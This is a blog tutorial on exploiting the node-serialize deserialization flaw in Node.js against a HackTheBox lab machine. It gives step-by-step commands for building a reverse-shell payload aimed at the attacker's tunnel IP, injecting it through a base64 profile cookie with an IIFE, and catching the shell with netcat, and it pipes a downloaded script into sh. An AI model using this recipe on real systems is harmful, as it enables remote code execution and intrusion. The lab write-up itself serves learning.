Node.js Deserialization Attack – Detailed Tutorial 2018

Node.js is a Javascript runtime. It encapsulates the Google V8 engine. The Google V8 engine quickly runs Javascript with high performance. Node.js optimizes certain special cases and provides substitute APIs, which enables the Google V8 engine to run more effectively in a non-browser environment.

But a remote code execution vulnerability still exists in the serialization process of Node.js. The node-serialize library of Node.js has a vulnerability. By transmitting JavaScript IIFE, attackers can use malicious code (untrusted data) to remotely run arbitrary code in deserialization.

Practical Demonstration – 

About the Vulnerability (Deserialization Attack) –

Untrusted data is passed into the unserialize()function, which leads to we can bypass with a immediately invoked function expression IIFE of JavaScript objects to implement arbitrary code execution.

So your step is to install the nodejs package with the help of apt-get command as shown below:

Command: apt-get install nodejs

In next step, you need to install npm utility (For further installation of node-serialize package with npm) with the help of CURL command as shown below:

Command: curl -L https://www.npmjs.com/install.sh | sh

As soon as you install and configure Nodejs and Npm, just install the node-serialize package with the help of npm by typing “npm install node-serialize” as shown below:

On other side, we’ve already connected with HacktheBox server whose Vulnerable Node Machine IP is 10.10.10.85:3000 (where Nodejs Express Framework is running which you can further confirm it with Nmap Scanning)

So, in first step, you need to capture the GET request of above Nodejs Vulnerable IP with the help of one of the most popular proxy intercepting tool i.e. Burp Suite which looks like below:

In second step, simply select the cookie value and send it to Decoder tab for further decryption.

The vulnerability in this vulnerable web application is that it reads a cookie named profile from the HTTP request, perform base64 decode of the cookie value and pass it to unserialize() function. As cookie is an untrusted input, an attacker can craft malicious cookie value to exploit this vulnerability.

In third step, you need to download the Nodejs Security Toolkit developed by Ajin Abraham who is one of the most popular Mobile Security Expert.

To install Nodejs Security Toolkit, type the following command in your terminal.

Command: git clone https://github.com/ajinabraham/Node.Js-Security-Course.git

Navigate to the downloaded folder and run the following command to create a reverse shell payload which evaluates the javascript code as a string.

First, you need to find out the tunnel IP by typing “ifconfig” and then run the following command:

Command: python nodejsshell.py 10.10.14.145 4443

This is the output of final reverse shell payload.

Now let’s generate the serialized payload with the following javascript.

Code:

var y = {
rce : function() {}
}
var serialize = require(‘node-serialize’);
console.log(“Serialized: \n” + serialize.serialize(y));

Add the above payload output in curly brackets {   eval(String.from………   } as shown below:

Save the file as exploit.js and run with node command which generates the final serialized payload as shown below:

Command: node exploit.js

Now go back to BurpSuite and navigate to Decoder tab and paste the above output code into Textarea and before to decode, add the IIFE brackets () after function body as shown below:

Here, we need to perform Base64 encode of the same, and then make a request to the web server with encoded payload in the Cookie header value.

Now to make a request, you need to send the same request to Repeater Tab.

In Repeater Tab, you need to replace the cookie value with base64 encoded value which we generated from above step and then click on GO button.

And side by side, make sure that your netcat service is listening on same port i.e. 4443 (its the same port for reverse shell payload)

Command: nc -lvp 4443

As soon as you click on Go button, the request will hit to server which shows 200 OK response with some error message “An error occurred…invalid username type” and instantly you’ll get connected with that server in netcat terminal with status “Connected“.

References – 

https://www.youtube.com/watch?time_continue=440&v=jIQWAz8UsLc

You may also like:

Sarcastic Writer

Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical hacking, seo tips and tricks, malware analysis and scanning.

Related Posts